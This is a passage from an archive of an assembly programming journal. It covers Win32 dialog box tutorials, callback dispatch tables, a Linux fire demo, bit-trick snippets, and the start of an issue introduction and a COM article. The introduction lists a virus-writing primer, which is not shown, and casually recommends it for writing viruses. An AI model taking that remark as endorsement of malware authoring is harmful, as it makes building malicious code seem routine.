DEFPUSHBUTTON "Say Hello", IDC_BUTTON, 141,10,52,13
PUSHBUTTON "E&xit", IDC_EXIT, 141,26,52,13
END
The above block defines the child window controls in the dialog box.
They're defined between BEGIN and END keywords. Generally the syntax is as
follows:
control-type "text" ,controlID, x, y, width, height [,styles]
control-types are resource compiler's constants so you have to consult the
manual.
Now we go to the assembly source code. The interesting part is in the
window class structure:
mov wc.cbWndExtra,DLGWINDOWEXTRA
mov wc.lpszClassName,OFFSET ClassName
Normally, the cbWndExtra member is left NULL, but if we want to register a
dialog box template as a window class, we must set it to the value
DLGWINDOWEXTRA. Note that the name of the class must be identical to the
one following the CLASS keyword in the dialog box template. The remaining
members are initialized as usual. After you fill in the window class
structure, register it with RegisterClassEx. Look familiar? This is the
same routine you go through in order to register a normal window class.
invoke CreateDialogParam,hInstance,ADDR DlgName,NULL,NULL,NULL
After registering the "window class", we create our dialog box. In this
example, I create it as a modeless dialog box with CreateDialogParam
function. This function takes 5 parameters but you only have to fill in the
first two: the instance handle and the pointer to the name of the dialog
box template. Note that the 2nd parameter is not a pointer to the class
name.
At this point, the dialog box and its child window controls are created by
Windows. Your window procedure will receive WM_CREATE message as usual.
invoke GetDlgItem,hDlg,IDC_EDIT
invoke SetFocus,eax
After the dialog box is created, I want to set the input focus to the edit
control. If I put this code in the WM_CREATE section, the GetDlgItem call
will fail since at that time the child window controls are not created yet.
The only way to do this is to call it after the dialog box and all its
child window controls are created, so I put these two lines after the
UpdateWindow call. The GetDlgItem function takes the dialog box handle and
a control ID and returns the associated control's window handle. This is
how you can get a window handle if you know its control ID.
invoke IsDialogMessage, hDlg, ADDR msg
.IF eax ==FALSE
invoke TranslateMessage, ADDR msg
invoke DispatchMessage, ADDR msg
.ENDIF
The program enters the message loop and, before we translate and dispatch
messages, we call the IsDialogMessage function to let the dialog box manager
handle the keyboard logic of our dialog box for us. If this function
returns TRUE, it means the message was intended for the dialog box and has
already been processed by the dialog box manager, so we must not translate
and dispatch it again. Note another difference from the previous tutorial.
When the window procedure wants to get the text from the edit control, it
calls the GetDlgItemText function instead of GetWindowText. GetDlgItemText
accepts a control ID instead of a window handle. That makes the call easier
when you use a dialog box.
------------------------------------------------------------------------
Now let's go to the second approach to using a dialog box as a main window.
In the next example, I'll create an application modal dialog box. You'll
not find a message loop or a window procedure because they're not
necessary!
------------------------------------------------------------------------
dialog.asm (part 2)
------------------------------------------------------------------------
.386
.model flat,stdcall
option casemap:none
DlgProc proto :DWORD,:DWORD,:DWORD,:DWORD
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
.data
DlgName db "MyDialog",0
AppName db "Our Second Dialog Box",0
TestString db "Wow! I'm in an edit box now",0
.data?
hInstance HINSTANCE ?
CommandLine LPSTR ?
buffer db 512 dup(?)
.const
IDC_EDIT equ 3000
IDC_BUTTON equ 3001
IDC_EXIT equ 3002
IDM_GETTEXT equ 32000
IDM_CLEAR equ 32001
IDM_EXIT equ 32002
.code
start:
invoke GetModuleHandle, NULL
mov hInstance,eax
invoke DialogBoxParam, hInstance, ADDR DlgName,NULL, addr DlgProc, NULL
invoke ExitProcess,eax
DlgProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
.IF uMsg==WM_INITDIALOG
invoke GetDlgItem, hWnd,IDC_EDIT
invoke SetFocus,eax
.ELSEIF uMsg==WM_CLOSE
invoke SendMessage,hWnd,WM_COMMAND,IDM_EXIT,0
.ELSEIF uMsg==WM_COMMAND
mov eax,wParam
.IF lParam==0
.IF ax==IDM_GETTEXT
invoke GetDlgItemText,hWnd,IDC_EDIT,ADDR buffer,512
invoke MessageBox,NULL,ADDR buffer,ADDR AppName,MB_OK
.ELSEIF ax==IDM_CLEAR
invoke SetDlgItemText,hWnd,IDC_EDIT,NULL
.ELSEIF ax==IDM_EXIT
invoke EndDialog, hWnd,NULL
.ENDIF
.ELSE
mov edx,wParam
shr edx,16
.if dx==BN_CLICKED
.IF ax==IDC_BUTTON
invoke SetDlgItemText,hWnd,IDC_EDIT,ADDR TestString
.ELSEIF ax==IDC_EXIT
invoke SendMessage,hWnd,WM_COMMAND,IDM_EXIT,0
.ENDIF
.ENDIF
.ENDIF
.ELSE
mov eax,FALSE
ret
.ENDIF
mov eax,TRUE
ret
DlgProc endp
end start
------------------------------------------------------------------------
dialog.rc (part 2)
------------------------------------------------------------------------
#include "resource.h"
#define IDC_EDIT 3000
#define IDC_BUTTON 3001
#define IDC_EXIT 3002
#define IDR_MENU1 3003
#define IDM_GETTEXT 32000
#define IDM_CLEAR 32001
#define IDM_EXIT 32002
MyDialog DIALOG 10, 10, 205, 60
STYLE 0x0004 | DS_CENTER | WS_CAPTION | WS_MINIMIZEBOX |
WS_SYSMENU | WS_VISIBLE | WS_OVERLAPPED | DS_MODALFRAME | DS_3DLOOK
CAPTION "Our Second Dialog Box"
MENU IDR_MENU1
BEGIN
EDITTEXT IDC_EDIT, 15,17,111,13, ES_AUTOHSCROLL | ES_LEFT
DEFPUSHBUTTON "Say Hello", IDC_BUTTON, 141,10,52,13
PUSHBUTTON "E&xit", IDC_EXIT, 141,26,52,13
END
IDR_MENU1 MENU
BEGIN
POPUP "Test Controls"
BEGIN
MENUITEM "Get Text", IDM_GETTEXT
MENUITEM "Clear Text", IDM_CLEAR
MENUITEM SEPARATOR
MENUITEM "E&xit", IDM_EXIT
END
END
------------------------------------------------------------------------
The analysis follows:
DlgProc proto :DWORD,:DWORD,:DWORD,:DWORD
We declare the function prototype for DlgProc so we can refer to it with
addr operator in the line below:
invoke DialogBoxParam, hInstance, ADDR DlgName,NULL, addr DlgProc, NULL
The above line calls DialogBoxParam function which takes 5 parameters: the
instance handle, the name of the dialog box template, the parent window
handle, the address of the dialog box procedure, and the dialog-specific
data. DialogBoxParam creates a modal dialog box. It will not return until
the dialog box is destroyed.
.IF uMsg==WM_INITDIALOG
invoke GetDlgItem, hWnd,IDC_EDIT
invoke SetFocus,eax
.ELSEIF uMsg==WM_CLOSE
invoke SendMessage,hWnd,WM_COMMAND,IDM_EXIT,0
The dialog box procedure looks like a window procedure except that it
doesn't receive the WM_CREATE message. The first message it receives is
WM_INITDIALOG. Normally you can put the initialization code here. Note that
you must return the value TRUE in eax if you process the message.
The internal dialog box manager doesn't send our dialog box procedure the
WM_DESTROY message by default when WM_CLOSE is sent to our dialog box. So
if we want to react when the user presses the close button on our dialog
box, we must process WM_CLOSE message. In our example, we send WM_COMMAND
message with the value IDM_EXIT in wParam. This has the same effect as when
the user selects Exit menu item. EndDialog is called in response to
IDM_EXIT.
The processing of WM_COMMAND messages remains the same.
When you want to destroy the dialog box, the only way is to call EndDialog
function. Do not try DestroyWindow! EndDialog doesn't destroy the dialog
box immediately. It only sets a flag for the internal dialog box manager
and continues to execute the next instructions.
Now let's examine the resource file. The notable change is that instead of
using a text string as menu name we use a value, IDR_MENU1. This is
necessary if you want to attach a menu to a dialog box created with
DialogBoxParam. Note that in the dialog box template, you have to add the
keyword MENU followed by the menu resource ID.
A difference between the two examples in this tutorial that you can readily
observe is the lack of an icon in the latter example. However, you can set
the icon by sending the message WM_SETICON to the dialog box during
WM_INITDIALOG.
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
Standardizing Win32 Callback Procedures
by Jeremy Gordon
This short article describes my preferred method for coding CALLBACK procedures
in a large assembler program for Windows 32. First I describe what Win32
callback procedures are, and then get down to some code.
At run time the Win32 system will call your program on a regular and frequent
basis. The procedures you supply for the system to call are called CALLBACK
procedures. Here are examples of when these are used:-
1. To manage a window you created. In this case the system will send many
messages to the Window Procedure for the window. The Window Procedure is
the code label you provide when you register your window class (by calling
RegisterClass). For example the message WM_SIZE is sent by the system
when the window is resized.
2. To inform the owner of a child window of events in the child window. For
example WM_PARENTNOTIFY (with a notify code) is sent to the Window
Procedure of the owner of a window when the child window is being created
or destroyed, or if the user clicks a mouse button while the cursor is
over the child window.
3. To inform the owner of a common control of events in the control. For
example if you create a button owned by your window the Window Procedure
for that window receives a WM_COMMAND message carrying the BN_CLICKED
notification code if the button is clicked.
4. Messages sent to a dialog you have created. These are messages relating
to the creation of the dialog and of the various controls. The dialog
procedure is informed of events in the controls.
5. If you "Superclass" or "Subclass" a common control, you receive messages
for that common control like a hook procedure but your window procedure
has the responsibility of passing them on to the control.
6. If you create "Hook" procedures you can intercept messages about to be sent
to other windows. The system will call your hook procedure and will pass
the message on only when your hook procedure returns.
7. You can ask the system to provide your program with information to be sent
to a CALLBACK procedure. Examples are EnumWindows (enumerate all top-level
windows) or EnumFonts (enumerate all available fonts).
In cases 1 to 5 above, just before the system calls the CALLBACK procedure,
it PUSHES 4 dwords on the stack (ie. 4 "parameters"). Traditionally the
names given to these parameters are:-
hWnd = handle of window being called
uMsg = message number
wParam = a parameter sent with the message
lParam = another parameter sent with the message.
The number of parameters sent to hook procedures and enumeration
callbacks varies - see the Windows SDK.
Since your Window (or Dialog) procedure will need to react in a certain
way depending on the message being sent, your code will need to divert
execution to the correct place for a particular message.
"C" programmers have the advantage of being able to code this simply,
using "switch" and "case".
Assembler programmers use various techniques. Perhaps the worst if there are
a lot of messages to handle is the chain of compares, eg. (in A386 format):-
MOV EAX,[EBP+0Ch] ;get message number
CMP EAX,1h ;see if WM_CREATE
JNZ >L2 ;no
XOR EAX,EAX ;ensure eax is zero on exit
JMP >L32 ;finish
L2:
CMP EAX,116h ;see if WM_INITMENU
JNZ >L4 ;no
CALL INITIALISE_MENU
JMP >L30 ;correct exit code
L4:
CMP EAX,47h ;see if WM_WINDOWPOSCHANGED
JNZ >L8
and so on ........
To avoid these long chains, assembler programmers have developed various
techniques. You will have seen many of these in sample code around Win32
assembler web sites and in the asm journal, using conditional jumps, macros
or table scans. I do not wish to compare these various methods, merely to put
forward my own current favourite, which I believe has these advantages:-
1. It works on all assemblers
2. It is modular, ie. the code for each window can be concentrated in a
particular part of your source code
3. It is easy to follow from the source code what message causes what result
4. The same function can easily be called from within different window
procedures
My method results in a very simple Window Procedure as follows (A386 format):-
WndProc:
MOV EDX,OFFSET MAINMESSAGES
CALL GENERAL_WNDPROC
RET 10h
where the messages and functions (specific to this particular window
procedure) are set out in a table such as this:-
;----------------------------------------------------------
DATA SEGMENT FLAT ;assembler to put following in data section
;--------------------------- WNDPROC message functions
MAINMESSAGES DD ENDOF_MAINMESSAGES-$ ;=number to be done
DD 312h,HOTKEY,116h,INITMENU,117h,INITMENUPOPUP,11Fh,MENUSELECT
DD 1h,CREATE,2h,DESTROY, 410h,OWN410,411h,OWN411
DD 231h,ENTERSIZEMOVE,47h,WINDOWPOSCHANGED,24h,GETMINMAXINFO
DD 1Ah,SETTINGCHANGE,214h,SIZING,46h,WINDOWPOSCHANGING
DD 2Bh,DRAWITEM,0Fh,PAINT,113h,TIMER,111h,COMMAND
DD 104h,SYSKEYDOWN,100h,KEYDOWN,112h,SYSCOMMAND
DD 201h,LBUTTONDOWN,202h,LBUTTONUP,115h,SCROLLMESS
DD 204h,RBUTTONDOWNUP,205h,RBUTTONDOWNUP
DD 200h,MOUSEMOVE,0A0h,NCMOUSEMOVE,20h,SETCURSORM
DD 4Eh,NOTIFY,210h,PARENTNOTIFY,86h,NCACTIVATE,6h,ACTIVATE
DD 1Ch,ACTIVATEAPP
ENDOF_MAINMESSAGES: ;label used to work out how many messages
;----------------------------------------------------------
_TEXT SEGMENT FLAT ;assembler to put following in code section
;----------------------------------------------------------
and where each of the functions here are procedures, for example:-
CREATE:
XOR EAX,EAX ;ensure zero and nc return
RET
and where GENERAL_WNDPROC is as follows:-
GENERAL_WNDPROC:
PUSH EBP
MOV EBP,[ESP+10h] ;get uMsg in ebp
MOV ECX,[EDX] ;get number of messages to do * 8 (+4)
SHR ECX,3 ;get number of messages to do
ADD EDX,4 ;jump over size dword
L33:
DEC ECX
JS >L46 ;s=message not found
CMP [EDX+ECX*8],EBP ;see if its the correct message
JNZ L33 ;no
MOV EBP,ESP
PUSH ESP,EBX,EDI,ESI ;save registers as required by Windows
ADD EBP,4 ;allow for the extra call to here
;now [EBP+8]=hWnd,[EBP+0Ch]=uMsg,[EBP+10h]=wParam,[EBP+14h]=lParam
CALL [EDX+ECX*8+4] ;call correct procedure for the message
POP ESI,EDI,EBX,ESP
JNC >L48 ;nc=don't call DefWindowProc eax=exit code
L46:
PUSH [ESP+18h],[ESP+18h],[ESP+18h],[ESP+18h] ;ESP changes on push
CALL DefWindowProcA
L48:
POP EBP
RET
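For readers who find it easier to follow the idea in a high-level language, here is a rough C sketch of the same table scan. It is not a translation of the A386 code: the message numbers, handler signature, default_proc stand-in and all function names are assumptions made up for illustration, and the "carry flag" is modelled as a nonzero return value from the handler.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical message numbers, chosen to resemble the table above. */
enum { MSG_CREATE = 0x1, MSG_PAINT = 0xF, MSG_COMMAND = 0x111 };

/* A handler returns 0 ("nc") when it has dealt with the message and stored
   the exit code in *result, or nonzero ("c") to ask for default handling. */
typedef int (*msg_handler)(uint32_t wparam, uint32_t lparam, long *result);

typedef struct {
    uint32_t    msg;      /* message number to match */
    msg_handler handler;  /* procedure to call for that message */
} msg_entry;

/* Stand-in for DefWindowProc; returns -1 so the fallback is easy to spot. */
static long default_proc(uint32_t msg, uint32_t wparam, uint32_t lparam)
{
    (void)msg; (void)wparam; (void)lparam;
    return -1;
}

static int on_create(uint32_t wparam, uint32_t lparam, long *result)
{
    (void)wparam; (void)lparam;
    *result = 0;            /* handled, exit code 0 */
    return 0;
}

static int on_command(uint32_t wparam, uint32_t lparam, long *result)
{
    (void)lparam;
    *result = (long)wparam; /* handled, echo wparam as the exit code */
    return 0;
}

static int on_paint(uint32_t wparam, uint32_t lparam, long *result)
{
    (void)wparam; (void)lparam; (void)result;
    return 1;               /* not handled here, use the default */
}

static const msg_entry main_messages[] = {
    { MSG_CREATE,  on_create  },
    { MSG_PAINT,   on_paint   },
    { MSG_COMMAND, on_command },
};

/* Scan the table from the last entry to the first, as the DEC ECX loop does. */
long general_wndproc(const msg_entry *table, size_t count,
                     uint32_t msg, uint32_t wparam, uint32_t lparam)
{
    for (size_t i = count; i-- > 0; ) {
        if (table[i].msg == msg) {
            long result = 0;
            if (table[i].handler(wparam, lparam, &result) == 0)
                return result;
            break;          /* handler asked for default processing */
        }
    }
    return default_proc(msg, wparam, lparam);
}

/* The per-window procedure only supplies its own table. */
long main_wndproc(uint32_t msg, uint32_t wparam, uint32_t lparam)
{
    return general_wndproc(main_messages,
                           sizeof main_messages / sizeof main_messages[0],
                           msg, wparam, lparam);
}
```

Calling main_wndproc(MSG_COMMAND, 42, 0) goes through on_command, while a message that is not in the table falls through to default_proc. A second window would reuse general_wndproc with a different table.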
NOTES:
-------------------------------------------------------------------------------
1. Instead of giving the actual message value, you can, of course, give
the name of an EQUATE. For example
WM_CREATE EQU 1h
enables you to use WM_CREATE,CREATE instead of 1h,CREATE if you wish.
2. It is tempting to keep the message table in the CODE SECTION. This is
perfectly possible because the only difference to the Win32 system between
the code section and the data section is that the code section area of
memory is marked read only, whereas the data section is read/write.
However, you may well get some loss of performance if you do this because
most processors will read data more quickly from the data section.
I performed some tests on this and found that having the table in the code
section rather than the data section could slow the code considerably:-
486 processor - 22% to 36% slower
Pentium processor - 94% to 161% slower
AMD-K6-3D processor - 78% to 193% slower
(but Pentium Pro - from 7% faster to 9% slower)
(and Pentium II - from 29% faster to 5% slower)
These tests were carried out on a table of 60 messages and the range of
results is because tests were carried out varying the number of scans
required before a find and also testing a no-find.
3. The procedure names must not be the names of API imports to avoid
confusion! For example change SETCURSOR slightly to avoid confusion
with the API SetCursor.
4. If a function returns c (carry flag set) the window procedure will call
DefWindowProc. An nc return (carry flag not set) will merely return to
the system with the return code in eax. (Some messages must be dealt with
in this way).
5. You can send a parameter of your own to GENERAL_WNDPROC using EAX.
This is useful if you wish to identify a particular window.
For example:-
SpecialWndProc:
MOV EAX,OFFSET hSpecialWnd
MOV EDX,OFFSET SPECIALWND_MESSAGES
CALL GENERAL_WNDPROC
RET 10h
6. The ADD EBP,4 just before the call to the function is to ensure that
EBP points to the parameters on the stack in the same way as if the window
procedure had been entered normally. This is intended to ensure that
the function will be compatible if called by an ordinary window procedure
written in assembler, for example:-
WndProc:
PUSH EBP
MOV EBP,ESP
;now [EBP+8]=hWnd,[EBP+0Ch]=uMsg,[EBP+10h]=wParam,[EBP+14h]=lParam
7. A standardized procedure for dealing with messages to a dialog procedure
can also be created in the same way, except that it should return TRUE
(eax=1) if the message is processed and FALSE (eax=0) if it is not, without
calling DefWindowProc. The same coding method can be applied to hooks and
to enumerator CALLBACKS although these will vary.
jorgon@...
http://ourworld.compuserve.com/homepages/jorgon
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::............................................THE.UNIX.WORLD
Fire Demo ported to Linux SVGAlib
by Jan Wagemakers
In APJ4 there was a nice little fire demo written in DOS assembly language.
I have ported this program to Linux assembly language. It is written in the
AT&T-syntax (GNU assembler) and makes use of SVGAlib.
My main goal of porting this program to Linux was to show that it can be
done. So, I have not optimized this program. For example, things like 'call
ioperm' can also be done by making use of int 0x80; quite possibly making use
of int 0x80 will make the program smaller. More information about int 0x80 is
available at Konstantin Boldyshev's webpage [http://lightning.voshod.com/asm].
With SVGALib you can access the screen memory directly, just like you
would write to A000:0000 in a DOS asm-program.
I would like to thank 'paranoya' for his explanation about how to make use of
SVGAlib. Anyway, enough blablabla, here is the source ;-)
# fire.s : fire.asm of apj 4 ported to Linux/SVGAlib ==========================
# gcc -o fire fire.s -lvga
.globl main
.type main,@function
main:
pushl %ebp
movl %esp,%ebp
call vga_init # Init vga
pushl $5
call vga_setmode # set mode to 5 = 320x200x256
addl $4,%esp
pushl $0
call vga_setpage # Point to page 0 (There is only 1 page)
addl $4,%esp
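pushl $1 # Turn On value (C arguments are pushed last to first)
pushl $2 # two ports: 3c8h and 3c9h
pushl $0x3c8 # Get IOpermission, starting from 3c8h
call ioperm # ioperm(0x3c8, 2, 1)
addl $12,%esp
pushl $1 # Turn On value
pushl $1 # one port
pushl $0x60 # Get IOpermission, for 60h : keyboard
call ioperm # ioperm(0x60, 1, 1)
addl $12,%esp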
inb $0x60,%al # Read current value of keyboard
movb %al,key
movw $0x3c8,%dx
movw $0,%ax
outb %al,%dx
incw %dx
lus:
outb %al,%dx
outb %al,%dx
outb %al,%dx
incw %ax
jnz lus
movl graph_mem,%ebx
Mainloop:
movl $1280,%esi # mov si,1280 ;
movl $0x5d00,%ecx # mov ch,5dh ; y-pos, the less the faster demo
pushl %esi # push si
pushl %ecx # push cx
Sloop:
movb (%ebx,%esi),%al # lodsb
incl %esi #
addb (%ebx,%esi),%al # al,[si] ; pick color and
addb 320(%ebx,%esi),%al # add al,[si+320] ; pick one more and
shrb $2,%al # shr al,2
movb %al,-960(%ebx,%esi) # mov [si-960],al ; put color
loop Sloop
popl %edi # pop di
popl %ecx # pop cx
Randoml:
mulw 1(%ebx,%edi) # mul word ptr [di+1] ; 'random' routine.
incw %ax
movw %ax,(%ebx,%edi) #stosw
incl %edi
incl %edi
loop Randoml
inb $0x60,%al
cmpb key,%al
jz Mainloop
pushl $0
call exit
addl $4,%esp
movl %ebp,%esp
popl %ebp
ret
.data
key:
.byte 0
# =============================================================================
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::................................ASSEMBLY.LANGUAGE.SNIPPETS
Abs
by Chris Dragan
;Summary: Calculates absolute value of a signed integer in eax.
;Compatibility: 386+
;Notes: 9 bytes, 4 clocks (P5), destroys ecx
mov ecx, eax ; Duplicate value
sar ecx, 31 ; Fill ecx with its sign (0 or -1)
xor eax, ecx ; Do 'not eax' if negative
sub eax, ecx ; Do 'inc eax' if negative
; For comparison, the standard way (2-8 clocks on P5 and 1-17 on P6):
; or eax, eax
; jns @@1
; neg eax
;@@1:
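The sign-mask trick can be checked in C as well. The sketch below is only an illustration (the function name abs_branchless is made up here); it builds a mask that is 0 for non-negative input and all ones for negative input, then applies the same xor and subtract. Unsigned arithmetic is used so that the code does not depend on how a given compiler shifts negative values.

```c
#include <stdint.h>

/* Absolute value without a conditional jump: xor with the sign mask,
   then subtract the mask. For INT32_MIN the result wraps back to
   INT32_MIN on the usual two's-complement targets, as it does in the
   assembly version. */
int32_t abs_branchless(int32_t x)
{
    uint32_t ux   = (uint32_t)x;
    uint32_t mask = 0u - (ux >> 31);    /* 0 or 0xFFFFFFFF */
    return (int32_t)((ux ^ mask) - mask);
}
```

For example, abs_branchless(-5) first turns -5 into 4 with the xor (a bitwise not), and the subtraction of -1 then gives 5.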
Min
by Chris Dragan
;Summary: eax = min (eax, ecx) (both eax and ecx unsigned)
;Compatibility: 386+
;Notes: 8 bytes, 4 clocks (P5), destroys ecx and edx
sub ecx, eax ; ecx = n2 - n1
sbb edx, edx ; edx = (n1 > n2) ? -1 : 0
and ecx, edx ; ecx = (n1 > n2) ? (n2 - n1) : 0
add eax, ecx ; eax += (n1 > n2) ? (n2 - n1) : 0
; Standard cmp/jbe/mov takes 2-8 clocks on P5 and 1-17 on P6
Max
by Chris Dragan
;Summary: eax = max (eax, ecx) (both eax and ecx unsigned)
;Compatibility: 386+
;Notes: 9 bytes, 5 clocks (P5), destroys ecx and edx
sub ecx, eax ; ecx = n2 - n1
cmc ; cf = n1 <= n2
sbb edx, edx ; edx = (n1 > n2) ? 0 : -1
and ecx, edx ; ecx = (n1 > n2) ? 0 : (n2 - n1)
add eax, ecx ; eax += (n1 > n2) ? 0 : (n2 - n1)
; Standard cmp/jae/mov takes 2-8 clocks on P5 and 1-17 on P6
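As a cross-check of the Min and Max snippets, here is the same arithmetic written in C. The function names are invented for this sketch, and the comparison that builds the mask stands in for the carry flag produced by SUB; whether a compiler turns it into SBB, SETcc or a branch is up to the compiler, so this shows the logic rather than the timing.

```c
#include <stdint.h>

/* min(n1, n2) for unsigned values, following sub/sbb/and/add. */
uint32_t min_branchless(uint32_t n1, uint32_t n2)
{
    uint32_t diff = n2 - n1;                    /* sub ecx, eax (may wrap) */
    uint32_t mask = 0u - (uint32_t)(n1 > n2);   /* sbb edx, edx */
    return n1 + (diff & mask);                  /* and ecx, edx / add eax, ecx */
}

/* max(n1, n2) for unsigned values, following sub/cmc/sbb/and/add. */
uint32_t max_branchless(uint32_t n1, uint32_t n2)
{
    uint32_t diff = n2 - n1;                    /* sub ecx, eax (may wrap) */
    uint32_t mask = 0u - (uint32_t)(n1 <= n2);  /* cmc / sbb edx, edx */
    return n1 + (diff & mask);                  /* and ecx, edx / add eax, ecx */
}
```

When the mask is all ones, n1 + (n2 - n1) wraps around to exactly n2, so the result is correct even if the subtraction itself overflowed.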
OBJECT
by mammon_
;Summary: Primitive for defining dynamic objects
;Compatibility: NASM
;Notes: The basic building block for classes in NASM; part of
; an ongoing project of mine. Note that .this can be
; filled with the instance pointer, and additional
; routines such as .%1 [constructor] and .~ can be added.
%macro OBJECT 1
struc %1
.this: resd 1
%endmacro
%macro END_OBJECT 0
endstruc
%endmacro
;_Sample:________________________________________________________________
;OBJECT MSGBOX
; .hWnd: resd 1
; .lpText: resd 1
; .lpCapt: resd 1
; .uInt: resd 1
; .show: resd 1
;END_OBJECT
;;MyMbox is a pointer to a location in memory or in an istruc; its members
;;are filled in an init routine ['new'] with "show" being "DD _show"
;_show: ;MSGBOX class display routine
; push dword [MyMbox + MSGBOX.uInt]
; push dword [MyMbox + MSGBOX.lpCapt]
; push dword [MyMbox + MSGBOX.lpText]
; push dword [MyMbox + MSGBOX.hWnd]
; call MessageBoxA
; ret
;..start:
; call [MyMbox + MSGBOX.show]
; ret
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................ISSUE.CHALLENGE
Binary-to-ASCII
by Jan Verhoeven
The Challenge
-------------
Write a routine to convert the value of a bit to ASCII in under 10 bytes, with
no conditional jumps.
The Solution
------------
Load the number into the AX register and shift through the bits. If a bit is
cleared [0], you want to print a "0" character; if a bit is set [1], you want
to print a "1".
Prime the BL register with the ASCII character "0"; if the next bit in AX is
set, carry will be set after the SHL and BL will thus be incremented to an
ASCII "1". The key, as you will see, is the ADC [AddWithCarry] instruction:
L0: B330 MOV BL,30 ; try with BL = ZERO
D1E0 SHL AX,1 ; ... but if bit = set, ...
80D300 ADC BL,00 ; ... make it a ONE,
7 bytes all told; with a loop and mov instruction for storing each value in
BL to the location of your choice, you will have a full-fledged binary-to-
ascii converter in a handful of bytes.
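The full converter mentioned above might look like this in C. This is only a sketch with made-up names (word_to_binary, out); the carry flag is modelled by reading the top bit before the shift, and adding it to the character '0' plays the role of ADC BL,0.

```c
#include <stdint.h>

/* Convert a 16-bit value to a string of '0' and '1' characters, most
   significant bit first. out must have room for 17 bytes. */
void word_to_binary(uint16_t value, char out[17])
{
    for (int i = 0; i < 16; i++) {
        unsigned carry = (value >> 15) & 1u;  /* bit that SHL AX,1 moves into carry */
        value = (uint16_t)(value << 1);       /* SHL AX,1 */
        out[i] = (char)('0' + carry);         /* MOV BL,"0" then ADC BL,0 */
    }
    out[16] = '\0';
}
```

Called with the value A5C3h, the buffer ends up holding "1010010111000011".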
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::.......................................................FIN
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::. Apr-June 99
:::\_____\::::::::::. Issue 4
::::::::::::::::::::::.........................................................
A S S E M B L Y P R O G R A M M I N G J O U R N A L
http://asmjournal.freeservers.com asmjournal@...
T A B L E O F C O N T E N T S
----------------------------------------------------------------------
Introduction...................................................mammon_
"Using COM in Assembly Language"..........................Lord.Lucifer
"Stack Frames and High-Level Calls"............................mammon_
"Define Your Memory".......................................Alan Baylis
"Writing a Boot Sector in A86"...........................Jan Verhoeven
"A Basic Virus Writing Primer"...................................Chili
Column: Win32 Assembly Programming
"Mouse Input....".........................................Iczelion
"Menus"...................................................Iczelion
Column: The C standard library in Assembly
"C string functions:_strtok"................................Xbios2
Column: The Unix World
"Using Menus in Xt"........................................mammon_
Column: Assembly Language Snippets
"Triple XOR".........................................Jan Verhoeven
"Trailing Calls".....................................Jan Verhoeven
Column: Issue Solution
"Fire Demo"....................................................iCE
----------------------------------------------------------------------
+++++++++++++++++++++Issue Challenge+++++++++++++++++++
Write a "Fire Demo"-style program in less than 100 bytes
----------------------------------------------------------------------
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::..............................................INTRODUCTION
by mammon_
In the last few months I have come across a number of links to APJ, and have
received the proverbial ton of email regarding it. Strangely enough, the
majority of these tend to agree that the one problem with the journal is its
infrequent --if not irregular-- publication. If that is the only complaint so
far, I think I can cope with it ;)
This issue is, naturally, very late due to what could be called "real world"
[lit., "that which does not go away when a power outage kills your PC"]
considerations; however the articles by weight alone should make up for some
of this.
The largest of the bunch is undoubtedly the virus writing tutorial by Chili,
who may have beaten my previous record for article length: a very thorough work,
worth reading just to help protect against virii, if not to write them. This
is accompanied by Jan's discussion of boot sector programming...a suitable
companion article, I believe.
High-level coders will undoubtedly be interested in Lord Lucifer's article on
COM programming in assembly; it seems that high-level areas such as COM,
DirectDraw, and Winsock coding are starting to receive a fair degree of
attention from the assembly language world, judging from the tutorials I have
been coming across.
Xbios2 has continued his excellent C stdlib work, and Iczelion has contributed
two more of his now-legendary Win32 asm tutorials; I of course have kept up
the Unix vanguard with yet another Xt article.
This month's challenge was contributed by iCE, and had a .text-size I could
not readily beat.
A few brief notes concerning the web page: I have thrown together a basic
collection of assembly language links at
http://asmjournal.freeservers.com/lynx.html
Submissions for this links page are welcome. I have also been getting a few
emails to the APJ inbox asking or offering help with assembly language; since
I check the inbox fortnightly at best, I have added a "classified ads" page to
the APJ website at
http://www.guestbook4free.com/en/28806/entries/
which is essentially a guestbook where people can post contact info, projects
they need help with, etc ... more or less a one-way bulletin board like, well,
like classified ads are.
That should just about wrap things up. Enjoy the issue!
_m
::/ \::::::.
:/___\:::::::.
/| \::::::::.
:| _/\:::::::::.
:| _|\ \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
Using COM in Assembly Language
by Lord Lucifer
This article will discuss how to use COM interfaces in your assembly language
programs. It will not discuss what COM is and how it is used, but rather how
it can be used when programming in assembler. It will discuss only how to
use existing interfaces, and not how to actually implement new ones; this will
be shown in a future article.
About COM
------------------------------------------------------------------------------
Here is a brief introduction to the basics behind COM.
A COM object is one in which access to an object's data is achieved
exclusively through one or more sets of related functions. These function
sets are called interfaces, and the functions of an interface are called
methods. COM requires that the only way to gain access to the methods of an
interface is through a pointer to the interface.
An interface is actually a contract that consists of a group of related
function prototypes whose usage is defined but whose implementation
is not. An interface definition specifies the interface's member functions,
called methods, their return types, the number and types of their parameters,
and what they must do. There is no implementation associated with an
interface. An interface implementation is the code a programmer supplies to
carry out the actions specified in an interface definition.
An instance of an interface implementation is actually a pointer to an array
of pointers to methods (a function table that refers to an implementation of
all of the methods specified in the interface). Any code that has a pointer
through which it can access the array can call the methods in that interface.
Using a COM object in assembly language
-------------------------------------------------------------------------------
Access to a COM object occurs through a pointer. This pointer points to a
table of function pointers in memory, called a virtual function table, or
vtable for short. This vtable contains the addresses of each of the object's
methods. To call a method, you indirectly call it through this pointer table.
